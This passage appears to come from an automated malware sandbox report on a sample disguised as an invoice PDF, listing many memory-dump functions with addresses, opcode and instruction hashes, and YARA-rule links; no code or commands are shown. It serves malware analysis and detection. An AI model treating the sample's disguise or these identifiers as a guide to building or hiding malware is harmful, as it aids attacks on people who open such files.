                                                                                      • Instruction ID: 05473a191ec615765cdaf499d34a1404e04eea147a203ab5e26cf0bdd25a5151
                                                                                      • Opcode Fuzzy Hash: 6a3468346dd188b67989e3beef3078c225a0d720a7556002fde50d5351b63b4c
                                                                                      • Instruction Fuzzy Hash: B1F0D43590420CEFCB91DFD8D9409ADBBB5FB48310F10C099AD1892321D7329A62EF90
                                                                                      Function 06504F80 Relevance: .0, Instructions: 26COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f33116868ff65e0703f44d9cbdccd3bcd813462734b20db320531d988099b91f
                                                                                      • Instruction ID: a6fbabb2bf2deec024ac0727cb5802c4136428208b26250f4d71941ddcbf9e08
                                                                                      • Opcode Fuzzy Hash: f33116868ff65e0703f44d9cbdccd3bcd813462734b20db320531d988099b91f
                                                                                      • Instruction Fuzzy Hash: 5FF03074D09248EFC751DBA4D9005ACBFF4AF89300F1484DAD95897392C6359E56CB51
                                                                                      Function 0676F238 Relevance: .0, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7e7e8744aab1b5c79cd154ea3c257e281a460cd68e36601c68a1c0a9372ce1f5
                                                                                      • Instruction ID: ed2018ae406e1f773b572c39778bff89a656ef94a925f3964cedf3aaae121915
                                                                                      • Opcode Fuzzy Hash: 7e7e8744aab1b5c79cd154ea3c257e281a460cd68e36601c68a1c0a9372ce1f5
                                                                                      • Instruction Fuzzy Hash: 40F03074904248EFCB40CF99D940ABDBBF9AF49310F14C099FC5893341C6359A51DF50
                                                                                      Function 066A66E0 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c630d61db1040cadc56237c3412d4554b4dddaac0cd9fa48829e61a8d2a80381
                                                                                      • Instruction ID: 00f0ffcab17aee31ac47343b756149ce50319eb090508cf3eb71a97284be81ac
                                                                                      • Opcode Fuzzy Hash: c630d61db1040cadc56237c3412d4554b4dddaac0cd9fa48829e61a8d2a80381
                                                                                      • Instruction Fuzzy Hash: 01F0A574D05208EFCB94DFA8D941AACBBF5EB48310F14C0AAAC1893351D632AE52DF91
                                                                                      Function 066A72D6 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed4571e4097a0a984d39e8459e48be036b0cb65aa5062a148ccec0f06e30a0d9
                                                                                      • Instruction ID: cbb7b73520c870636a09b5305c01c9d517f2dd2c37545e3229d22cd71c7eb772
                                                                                      • Opcode Fuzzy Hash: ed4571e4097a0a984d39e8459e48be036b0cb65aa5062a148ccec0f06e30a0d9
                                                                                      • Instruction Fuzzy Hash: 6EE0ED78D05208EFC794DFA8D545AADBBF4EF89300F10C0A9A80893341D6319E52CF91
                                                                                      Function 066A79F6 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ed4571e4097a0a984d39e8459e48be036b0cb65aa5062a148ccec0f06e30a0d9
                                                                                      • Instruction ID: 94941fa65ae7cf398aec9ba4fd9d9f19f94dc0a2a694a98f5391f69daa14ad20
                                                                                      • Opcode Fuzzy Hash: ed4571e4097a0a984d39e8459e48be036b0cb65aa5062a148ccec0f06e30a0d9
                                                                                      • Instruction Fuzzy Hash: 78E0ED74D05208EFCB94DFA8D545AADBBF5EB88300F10C4A99808E3341D6319E42CF91
                                                                                      Function 065C2770 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e107790c96620d79c4c89dfaaef952d5460ef4a4a90273fc3e3b94fde7b7f3cf
                                                                                      • Instruction ID: 2f73d720e0657df0be617727e72d31724870f14f4abe4d76455c59301597653b
                                                                                      • Opcode Fuzzy Hash: e107790c96620d79c4c89dfaaef952d5460ef4a4a90273fc3e3b94fde7b7f3cf
                                                                                      • Instruction Fuzzy Hash: 5DE09234809208EFC710DF94D945DADBBB4EB49310F1080999C0417300D6315E52DAD5
                                                                                      Function 06768CF3 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 395e57e41f2255f7afdc099e029817ec666cf2cf86a6dae40c2a892695eb3b30
                                                                                      • Instruction ID: 090482bb809c26559ed6db9c32d85a3ab903cf323752820076c7c104b26255c0
                                                                                      • Opcode Fuzzy Hash: 395e57e41f2255f7afdc099e029817ec666cf2cf86a6dae40c2a892695eb3b30
                                                                                      • Instruction Fuzzy Hash: 9BF0392100EBC49FC3078B659C688657F359E2B61434940EBE189CB1A3C7268815C7B2
                                                                                      Function 06501A8D Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 68e91465fb6bce49e87563dbcf891294b1be0e1cd40dbc135498994040a3a3ad
                                                                                      • Instruction ID: 6ee4c779d7f1424d29c98e342fdcd994de9b7b38d7677bd4c96564773867ae6c
                                                                                      • Opcode Fuzzy Hash: 68e91465fb6bce49e87563dbcf891294b1be0e1cd40dbc135498994040a3a3ad
                                                                                      • Instruction Fuzzy Hash: E5F09DB0901628CFEBA5CFA4D994BDDB6B2BB05301F105499E40DA22A0C7309A85CF52
                                                                                      Function 00D7938F Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2208167105.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_d70000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69c15d6e9ccd995d5470b8532adb7bab711e7d499cfe03952afc806e24a10d1a
                                                                                      • Instruction ID: 92ca45203e994b01f22331c321ef1930a5b1c1718a83ee59cc3b0251cfe7cb3f
                                                                                      • Opcode Fuzzy Hash: 69c15d6e9ccd995d5470b8532adb7bab711e7d499cfe03952afc806e24a10d1a
                                                                                      • Instruction Fuzzy Hash: 31F07475A11328CFDB609F28D988798B7B0FB5A311F1040E6E80AE2A50DB341FC4DF12
                                                                                      Function 066AA5AF Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 836df64fc7e300aff5f605b1caaafc314113dd0c0836559c0cf9b033fd635d4b
                                                                                      • Instruction ID: e49c9791554451d0324a8ed94bfea0ad5a524e4203d205b47c64ce3e798f74e1
                                                                                      • Opcode Fuzzy Hash: 836df64fc7e300aff5f605b1caaafc314113dd0c0836559c0cf9b033fd635d4b
                                                                                      • Instruction Fuzzy Hash: D9E0ED74D05308EFC794DFE8D5416ACBBF4EB48304F10C0AA981893341D631AE52DF95
                                                                                      Function 066AF910 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8e8a9ff8652137bad00164ac4ff35d3a6e7259aa23da441c44679edcf8a3ac83
                                                                                      • Instruction ID: 791479812b225df3c9953ca899d4d5f7d8edfc53a7c9c3a06f19b17496df676c
                                                                                      • Opcode Fuzzy Hash: 8e8a9ff8652137bad00164ac4ff35d3a6e7259aa23da441c44679edcf8a3ac83
                                                                                      • Instruction Fuzzy Hash: 0FE07D30700304AFCBE06A70CC4175132D96B41211F10002CD7259F380CE72EC41CB57
                                                                                      Function 069B60C8 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bb4d07ae03e844dcf469d2aabd16f5937f1336fbb3d8bc4331e6f931f5cdcbf
                                                                                      • Instruction ID: 83b48bbf0e3aeb293bcfd1899221b457b8cfeeb084309687b0d2cbee9ea1d717
                                                                                      • Opcode Fuzzy Hash: 9bb4d07ae03e844dcf469d2aabd16f5937f1336fbb3d8bc4331e6f931f5cdcbf
                                                                                      • Instruction Fuzzy Hash: FDE0C974D05208EFCB94DFA9D540AACBBF4EB48310F10C0A9D84893351D631AA52DF80
                                                                                      Function 069BBF88 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bb4d07ae03e844dcf469d2aabd16f5937f1336fbb3d8bc4331e6f931f5cdcbf
                                                                                      • Instruction ID: 8de9a9171221f90c616b2d63a8433109d4520c1334d4d3253e28689bab9e3835
                                                                                      • Opcode Fuzzy Hash: 9bb4d07ae03e844dcf469d2aabd16f5937f1336fbb3d8bc4331e6f931f5cdcbf
                                                                                      • Instruction Fuzzy Hash: 76E0C974D0920CEFCB94DFA8D540AACBBF4EB48310F10C0A9980893355D6319A52DF80
                                                                                      Function 069BA5F0 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bb4d07ae03e844dcf469d2aabd16f5937f1336fbb3d8bc4331e6f931f5cdcbf
                                                                                      • Instruction ID: 6dc55800b92be471715a0b88f0dcce04e81bd444a13f27fbbbb3332d49479764
                                                                                      • Opcode Fuzzy Hash: 9bb4d07ae03e844dcf469d2aabd16f5937f1336fbb3d8bc4331e6f931f5cdcbf
                                                                                      • Instruction Fuzzy Hash: 44E0ED74D05208EFCB94DFA8D640AACFBF4EB48310F10C0A99C1893351D6319E52DF84
                                                                                      Function 065CAFF8 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69233a4a64f048fe712848cd22c2860ecd50c3df96fc8d04a6e76bf849d3a87a
                                                                                      • Instruction ID: 09da42b417bf3a6e4e4915c5ae7204c9d07d25ba895ae4d82fa96d0503fd526c
                                                                                      • Opcode Fuzzy Hash: 69233a4a64f048fe712848cd22c2860ecd50c3df96fc8d04a6e76bf849d3a87a
                                                                                      • Instruction Fuzzy Hash: 28E0C974D05208EFCB94DFA8D541AACBBF4FB58310F10C0A99818A3351D6319A52DF84
                                                                                      Function 065C7BB8 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fe198c22b2687d492f982b8c8cb233f97684f985400306ced2eb97931ac4c5c9
                                                                                      • Instruction ID: 5ff92316b064325c59c084864b0721be94097c1447d3cef52a76d3de71968b66
                                                                                      • Opcode Fuzzy Hash: fe198c22b2687d492f982b8c8cb233f97684f985400306ced2eb97931ac4c5c9
                                                                                      • Instruction Fuzzy Hash: 2FF0A534905208EFCB45DF98D9409ACBBB5FB58324F10C499AC1857351D6369A62DF80
                                                                                      Function 065CC068 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69233a4a64f048fe712848cd22c2860ecd50c3df96fc8d04a6e76bf849d3a87a
                                                                                      • Instruction ID: 6eb76464d3586ac1c27f99b653f7f13bb637dc4fb1f4908f9aa964b5901edec3
                                                                                      • Opcode Fuzzy Hash: 69233a4a64f048fe712848cd22c2860ecd50c3df96fc8d04a6e76bf849d3a87a
                                                                                      • Instruction Fuzzy Hash: 5DE0C974D05208EFCB94DFE8D541AACBBF4FB48310F10C1A99809A3351D6329A52DF80
                                                                                      Function 065C6940 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69233a4a64f048fe712848cd22c2860ecd50c3df96fc8d04a6e76bf849d3a87a
                                                                                      • Instruction ID: 24baa0bef571e54b1f3dcf55ea8c662188bcaa9e13d36753e527045bca2cf6b8
                                                                                      • Opcode Fuzzy Hash: 69233a4a64f048fe712848cd22c2860ecd50c3df96fc8d04a6e76bf849d3a87a
                                                                                      • Instruction Fuzzy Hash: DDE0C974D05208EFCB94DFA8D540AACBBF4EB48310F10C5A99818A3351D6319A52DF81
                                                                                      Function 06762798 Relevance: .0, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2222610209.0000000006760000.00000040.00000800.00020000.00000000.sdmp, Offset: 06760000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6760000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 783f9bc4fe9042b67052d94b7037d527853da1f9ecc59ae2c927c8b3bee165ee
                                                                                      • Instruction ID: ee651809fcf8a58cfd4aa8627baf4f6c67f5a63395a6f55766cea0ce231d49ec
                                                                                      • Opcode Fuzzy Hash: 783f9bc4fe9042b67052d94b7037d527853da1f9ecc59ae2c927c8b3bee165ee
                                                                                      • Instruction Fuzzy Hash: 8DE0CD317096111FD755413D7C948673BD69BC47103009577F544CB256DD50DD4147A2
                                                                                      Function 0650F448 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92e8aceb46b7344977281ebdc1c9d063a8e24e0a14ac1d0e112467ab255d13e0
                                                                                      • Instruction ID: 3a438ea90ce276c7950e44976d9e80493f4936af853b1b4e342a7ac35fa9b216
                                                                                      • Opcode Fuzzy Hash: 92e8aceb46b7344977281ebdc1c9d063a8e24e0a14ac1d0e112467ab255d13e0
                                                                                      • Instruction Fuzzy Hash: 00E0E574E05208EFDB94DFA8D6406ACBBF4EB48304F10C0A99C08A3341D635AA42CF81
                                                                                      Function 06500448 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221054323.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_6500000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 92e8aceb46b7344977281ebdc1c9d063a8e24e0a14ac1d0e112467ab255d13e0
                                                                                      • Instruction ID: 8d1f04bf8f7128ba1d1f86c26d3780a7693e5d606f954cfde48708da2275005c
                                                                                      • Opcode Fuzzy Hash: 92e8aceb46b7344977281ebdc1c9d063a8e24e0a14ac1d0e112467ab255d13e0
                                                                                      • Instruction Fuzzy Hash: 88E0E574E09208EFDB94DFA8D5406ACBBF4EB48304F10C0A99808A3381E631AA42CF85
                                                                                      Function 066AA5B0 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 910793f2c42a84fd4331083ea96c61adf08c386fc7d25ce960a727342ea81020
                                                                                      • Instruction ID: 34b53f84bec0621e55aa0e610e65608aa9c3b0b7cc10729561522091b034e7f4
                                                                                      • Opcode Fuzzy Hash: 910793f2c42a84fd4331083ea96c61adf08c386fc7d25ce960a727342ea81020
                                                                                      • Instruction Fuzzy Hash: 54E0E574E09308EFCB94DFE8D5406ACBBF4EB48304F10C0AA981893341D631AE52DF84
                                                                                      Function 066A9838 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 910793f2c42a84fd4331083ea96c61adf08c386fc7d25ce960a727342ea81020
                                                                                      • Instruction ID: 96fcd4df45f70b917d12801abae30e56fadc8ac16563573dd42279ed984d8250
                                                                                      • Opcode Fuzzy Hash: 910793f2c42a84fd4331083ea96c61adf08c386fc7d25ce960a727342ea81020
                                                                                      • Instruction Fuzzy Hash: 5BE0E574E05208EFCB94DFA8D5406ACBBF4EB48300F20C5A9981993341D631AE46DF80
                                                                                      Function 066A60B8 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221827916.00000000066A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_66a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 910793f2c42a84fd4331083ea96c61adf08c386fc7d25ce960a727342ea81020
                                                                                      • Instruction ID: 8182ec51a07d10fe988a3877ef000f75888c8e52cf12fe8b872131664bb395c2
                                                                                      • Opcode Fuzzy Hash: 910793f2c42a84fd4331083ea96c61adf08c386fc7d25ce960a727342ea81020
                                                                                      • Instruction Fuzzy Hash: CAE07574E05208EFCB94DFA8D6456ACFBF4EB48314F14C1A99818E3351D636AE52DF81
                                                                                      Function 069B9C08 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23e71a221615cd3ec9efdeb4511b8e711463eff4a8b8284e0b1eb86b44e71afa
                                                                                      • Instruction ID: 5effd5d041e6b453768d9341820f8c90deb4ea9e6d6b07b762174535938cebe6
                                                                                      • Opcode Fuzzy Hash: 23e71a221615cd3ec9efdeb4511b8e711463eff4a8b8284e0b1eb86b44e71afa
                                                                                      • Instruction Fuzzy Hash: E4E0E574E05208EFCB94DFE8D6406ACBBF4EB49300F20C5A9980C93351D631AE42CF80
                                                                                      Function 069BD9E8 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23e71a221615cd3ec9efdeb4511b8e711463eff4a8b8284e0b1eb86b44e71afa
                                                                                      • Instruction ID: dc108b141660a805dd2464521fb0c7acbd1e3d2fabc27dd6c829081e0d45a474
                                                                                      • Opcode Fuzzy Hash: 23e71a221615cd3ec9efdeb4511b8e711463eff4a8b8284e0b1eb86b44e71afa
                                                                                      • Instruction Fuzzy Hash: 7DE0E574E09208EFCB94DFA8D6406ACBBF4EF48310F10C0A9D80893341D631AE46CF80
                                                                                      Function 069BF758 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2223664101.00000000069A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_69a0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23e71a221615cd3ec9efdeb4511b8e711463eff4a8b8284e0b1eb86b44e71afa
                                                                                      • Instruction ID: 254d36f5c52de8ad09422a7eb168396b8c8bf79fe5469dda13e2952e6eb909ed
                                                                                      • Opcode Fuzzy Hash: 23e71a221615cd3ec9efdeb4511b8e711463eff4a8b8284e0b1eb86b44e71afa
                                                                                      • Instruction Fuzzy Hash: 19E0E574E05208EFCB94DFA8DA806ACFBF4EB48300F10C0E9980893351D671AE42CF80
                                                                                      Function 065C9F58 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 55c0a12cb842ed6909fa2417abf7927169891950bd22b422fae95c81dd865adb
                                                                                      • Instruction ID: 446b819ca186792c19ac168e2a76ac16ffd0b9670ce3a449b38a13063a4b1927
                                                                                      • Opcode Fuzzy Hash: 55c0a12cb842ed6909fa2417abf7927169891950bd22b422fae95c81dd865adb
                                                                                      • Instruction Fuzzy Hash: F4E01A38909208EFCB05DFD4D9409ADBFB5FB49310F10C09DEC0917351C632AA62EB90
                                                                                      Function 065C2C70 Relevance: .0, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2221480206.00000000065C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065C0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_65c0000_FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
